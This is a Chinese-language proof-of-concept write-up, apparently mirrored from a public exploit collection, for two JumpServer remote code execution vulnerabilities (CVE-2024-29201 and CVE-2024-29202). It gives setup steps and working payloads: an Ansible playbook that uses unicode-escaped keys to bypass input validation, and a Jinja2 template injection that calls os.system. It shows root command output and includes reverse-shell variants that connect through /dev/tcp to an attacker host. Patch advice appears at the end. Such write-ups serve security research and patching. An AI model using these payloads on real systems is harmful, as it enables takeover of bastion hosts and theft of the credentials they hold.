mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 11:27:43 +00:00
234 lines
7.5 KiB
Markdown
234 lines
7.5 KiB
Markdown
# JumpServer 远程代码执行漏洞 CVE-2024-29201&CVE-2024-29202
|
||
|
||
## 漏洞描述
|
||
|
||
JumpServer 是使用广泛的开源堡垒机,使用 GNU GPL v2.0 开源协议,是符合 4A 规范的运维安全审计系统。
|
||
|
||
- CVE-2024-29201 远程代码执行漏洞:由于 JumpServer 中的 Ansible 模块未进行完整的输入验证,具有低权限账户的攻击者可以绕过输入验证机制在 Celery 容器中执行任意代码,并从主机中窃取敏感信息或操纵数据库。
|
||
- CVE-2024-29202 Jinjia2 模板注入漏洞:经过身份验证的攻击者可以通过构建恶意 playbook 模板,利用 Ansible 中的 Jinja2 模板引擎在 Celery 容器中执行任意代码,并从主机中窃取敏感信息或操纵数据库。
|
||
|
||
**两个漏洞利用的条件都需要账号且至少有一个资产**。
|
||
|
||
参考链接:
|
||
|
||
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-pjpp-cm9x-6rwj
|
||
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-2vvr-vmvx-73ch
|
||
- https://wh0am1i.com/2024/03/30/JumpServer-CVE-2024-29201-CVE-2024-29202/
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
v3.0.0 <= JumpServer <= v3.10.6
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
app="JumpServer-Bastion-Host"
|
||
```
|
||
|
||
## 环境搭建
|
||
|
||
下载官方提供的 [脚本](https://resource.fit2cloud.com/jumpserver/jumpserver/releases/latest/download/quick_start.sh),编辑 `quick_start.sh`,将脚本中的 `VERSION` 修改为存在漏洞版本,如:`V3.10.6`。
|
||
|
||
|
||
|
||
环境启动后,访问 `http://your-ip` 即可看到 JumpServer 首页,默认账号密码 `admin/admin`。默认密码登陆后,JumpServer 将强制要求用户修改密码。
|
||
|
||
### 创建用户
|
||
|
||
```
|
||
用户管理 → 用户列表 → 创建
|
||
```
|
||
|
||
创建用户 `threekiii`,后续将使用该账户进行攻击操作:
|
||
|
||
|
||
|
||
### 添加资产
|
||
|
||
准备一个 Linux 资产:
|
||
|
||
```
|
||
[IP Address] 192.168.43.169
|
||
[Username/Password] kali/kali
|
||
```
|
||
|
||
将这个 Linux 资产添加到资产列表,命名为 `test`:
|
||
|
||
```
|
||
资产管理 → 资产列表 → 创建
|
||
```
|
||
|
||
|
||
|
||
添加完成后,点击更新,添加账号 `kali` 并配置密码为 `kali`:
|
||
|
||
|
||
|
||
点击测试,以测试配置是否成功:
|
||
|
||
|
||
|
||
### 授权资产
|
||
|
||
将上一步添加的资产 `test` 授权给用户 `threekiii`:
|
||
|
||
```
|
||
权限管理 → 资产授权 → 创建
|
||
```
|
||
|
||
|
||
|
||
## 漏洞复现
|
||
|
||
### CVE-2024-29201
|
||
|
||
以攻击者用户 `threekiii` 登录 JumpServer,切换到工作台,创建 Playbook,命名为 `CVE-2024-29201`:
|
||
|
||
```
|
||
作业中心 → 模板管理 → Playbook管理 → 创建 → 创建playbook
|
||
```
|
||
|
||
|
||
|
||
点击创建的 Playbook 名称 `CVE-2024-29201`,切换到工作空间,输入以下内容,保存:
|
||
|
||
```
|
||
[{
|
||
"name": "RCE playbook",
|
||
"hosts": "all",
|
||
"tasks": [
|
||
{
|
||
"name": "this runs in Celery container",
|
||
"shell": "id > /tmp/awesome_poc",
|
||
"\u0064elegate_to": "localhost"
|
||
} ],
|
||
"vars": {
|
||
"ansible_\u0063onnection": "local"
|
||
}
|
||
}]
|
||
```
|
||
|
||
|
||
|
||
切换到作业管理,创建一个新的 Playbook 作业:
|
||
|
||
```
|
||
作业中心 → 作业管理 → 创建 → Playbook作业
|
||
```
|
||
|
||
|
||
|
||
点击提交,运行作业:
|
||
|
||
|
||
|
||
|
||
|
||
进入 Celery 容器,成功在 `/tmp` 目录下创建 `awesome_poc` 文件:
|
||
|
||
```
|
||
root@jms_celery:/opt/jumpserver# ls /tmp
|
||
artifacts awesome_poc local.pid worker_heartbeat_ansible worker_heartbeat_celery worker_ready_ansible worker_ready_celery
|
||
|
||
root@jms_celery:/opt/jumpserver# cat /tmp/awesome_poc
|
||
uid=0(root) gid=0(root) groups=0(root)
|
||
```
|
||
|
||
|
||
|
||
### CVE-2024-29202
|
||
|
||
以攻击者用户 `threekiii` 登录 JumpServer,切换到工作台,创建 Playbook,命名为 `CVE-2024-29202`:
|
||
|
||
```
|
||
作业中心 → 模板管理 → Playbook管理 → 创建 → 创建playbook
|
||
```
|
||
|
||
点击创建的 Playbook 名称 `CVE-2024-29202`,切换到工作空间,输入以下内容,保存:
|
||
|
||
```
|
||
- name: |
|
||
{% for x in ().__class__.__base__.__subclasses__() %}
|
||
{% if "warning" in x.__name__ %}
|
||
{{
|
||
x()._module.__builtins__["__import__"]("os").system("id > /tmp/awesome_poc_2")
|
||
}}
|
||
{%endif%}
|
||
{%endfor%}
|
||
```
|
||
|
||
|
||
|
||
切换到作业管理,创建一个新的 Playbook 作业:
|
||
|
||
```
|
||
作业中心 → 作业管理 → 创建 → Playbook作业
|
||
```
|
||
|
||
|
||
|
||
点击提交,运行作业,报错不影响执行:
|
||
|
||
|
||
|
||
进入 Celery 容器,成功在 `/tmp` 目录下创建 `awesome_poc_2` 文件:
|
||
|
||
```
|
||
root@jms_celery:/opt/jumpserver# ls /tmp
|
||
artifacts awesome_poc awesome_poc_2 local.pid worker_heartbeat_ansible worker_heartbeat_celery worker_ready_ansible worker_ready_celery
|
||
root@jms_celery:/opt/jumpserver# cat /tmp/awesome_poc_2
|
||
127.0.0.1 localhost
|
||
::1 localhost ip6-localhost ip6-loopback
|
||
fe00::0 ip6-localnet
|
||
ff00::0 ip6-mcastprefix
|
||
ff02::1 ip6-allnodes
|
||
ff02::2 ip6-allrouters
|
||
192.168.250.7 jms_celery
|
||
```
|
||
|
||
|
||
|
||
### Reverse Shell
|
||
|
||
CVE-2024-29201 payload:
|
||
|
||
```
|
||
[{
|
||
"name": "RCE playbook",
|
||
"hosts": "all",
|
||
"tasks": [
|
||
{
|
||
"name": "this runs in Celery container",
|
||
"shell": "bash -i >& /dev/tcp/your-ip/8888 0>&1",
|
||
"\u0064elegate_to": "localhost"
|
||
} ],
|
||
"vars": {
|
||
"ansible_\u0063onnection": "local"
|
||
}
|
||
}]
|
||
```
|
||
|
||
|
||
|
||
CVE-2024-29202 payload:
|
||
|
||
```
|
||
- name: |
|
||
{% for x in ().__class__.__base__.__subclasses__() %}
|
||
{% if "warning" in x.__name__ %}
|
||
{{
|
||
x()._module.__builtins__["__import__"]("os").system("bash -i >& /dev/tcp/your-ip/8888 0>&1")
|
||
}}
|
||
{%endif%}
|
||
{%endfor%}
|
||
```
|
||
|
||
|
||
|
||
## 漏洞修复
|
||
|
||
1. 升级到 v3.10.7 版本。目前官方已在最新版本中修复了上述漏洞,下载链接: https://github.com/jumpserver/jumpserver/releases。
|
||
2. 关闭任务中心,任务中心位于:系统设置 - 功能设置 - 任务中心。
|